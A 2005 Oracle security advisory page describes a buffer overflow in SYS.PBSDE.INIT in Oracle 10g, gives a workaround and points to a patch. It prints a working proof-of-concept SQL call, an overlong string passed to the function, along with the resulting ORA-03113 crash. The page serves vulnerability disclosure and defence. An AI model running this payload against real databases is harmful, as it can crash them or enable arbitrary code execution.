Products
Red-Database-Security GmbH is specialized in Oracle SecurityProductsRepscan 2.5 Hedgehog Enterprise Checkpwd (free)
Services
Information
Company |
Crash entire database via pbsde.init in Oracle 10g
Details Buffer Overflow in SYS.PBSDE.INIT. This function has EXECUTE permission granted to SYSDBA or EXECUTE_CATALOG_ROLE. Members of these groups can exploit this vulnerability and crash the database or execute arbitrary code. Example SQL> exec sys.pbsde.init('AA',TRUE,'MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_A NN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MA RY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSO N_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON',NULL); BEGIN sys.pbsde.init('AA',TRUE,'MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_A NN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MA RY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSO N_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON',NULL); END; * ERROR at line 1: ORA-03113: end-of-file on communication channel Workaround Revoke execute privilege on sys.pbdsde.init from public revoke execute on sys.pbsde from public; Patch Information Apply the latest Oracle Security patches (e.g. CPU October 2004 or at least alert 68) © 2005 by Red-Database-Security GmbH - last update 02-nov-2005 |
Definition Exploit |